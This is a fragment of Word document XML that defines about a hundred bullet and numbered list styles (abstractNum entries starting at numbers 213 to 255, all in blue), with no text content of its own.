  <w:abstractNum w:abstractNumId="21730">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21731">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21732">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21733">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21734">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21735">
    <w:lvl>
      <w:start w:val="213"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21736">
    <w:lvl>
      <w:start w:val="214"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21737">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21738">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21739">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21740">
    <w:lvl>
      <w:start w:val="215"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21741">
    <w:lvl>
      <w:start w:val="216"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21742">
    <w:lvl>
      <w:start w:val="217"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21743">
    <w:lvl>
      <w:start w:val="218"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21744">
    <w:lvl>
      <w:start w:val="219"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21745">
    <w:lvl>
      <w:start w:val="220"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21746">
    <w:lvl>
      <w:start w:val="221"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21747">
    <w:lvl>
      <w:start w:val="222"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21748">
    <w:lvl>
      <w:start w:val="223"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21749">
    <w:lvl>
      <w:start w:val="224"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21750">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21751">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21752">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21753">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21754">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21755">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21756">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21757">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21758">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21759">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21760">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21761">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21762">
    <w:lvl>
      <w:start w:val="225"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21763">
    <w:lvl>
      <w:start w:val="226"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21764">
    <w:lvl>
      <w:start w:val="227"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21765">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21766">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21767">
    <w:lvl>
      <w:start w:val="228"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21768">
    <w:lvl>
      <w:start w:val="229"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21769">
    <w:lvl>
      <w:start w:val="230"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21770">
    <w:lvl>
      <w:start w:val="231"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21771">
    <w:lvl>
      <w:start w:val="232"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21772">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21773">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21774">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21775">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21776">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21777">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21778">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21779">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21780">
    <w:lvl>
      <w:start w:val="233"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21781">
    <w:lvl>
      <w:start w:val="234"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21782">
    <w:lvl>
      <w:start w:val="235"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21783">
    <w:lvl>
      <w:start w:val="236"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21784">
    <w:lvl>
      <w:start w:val="237"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21785">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21786">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21787">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21788">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21789">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21790">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21791">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21792">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21793">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21794">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21795">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21796">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21797">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21798">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21799">
    <w:lvl>
      <w:start w:val="238"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21800">
    <w:lvl>
      <w:start w:val="239"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21801">
    <w:lvl>
      <w:start w:val="240"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21802">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21803">
    <w:lvl>
      <w:start w:val="241"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21804">
    <w:lvl>
      <w:start w:val="242"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21805">
    <w:lvl>
      <w:start w:val="243"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21806">
    <w:lvl>
      <w:start w:val="244"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21807">
    <w:lvl>
      <w:start w:val="245"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21808">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21809">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21810">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21811">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21812">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21813">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21814">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21815">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21816">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21817">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21818">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21819">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21820">
    <w:lvl>
      <w:start w:val="246"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21821">
    <w:lvl>
      <w:start w:val="247"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21822">
    <w:lvl>
      <w:start w:val="248"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21823">
    <w:lvl>
      <w:start w:val="249"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21824">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21825">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21826">
    <w:lvl>
      <w:start w:val="250"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21827">
    <w:lvl>
      <w:start w:val="251"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21828">
    <w:lvl>
      <w:start w:val="252"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21829">
    <w:lvl>
      <w:start w:val="253"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21830">
    <w:lvl>
      <w:start w:val="254"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21831">
    <w:lvl>
      <w:start w:val="255"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21832">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21833">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
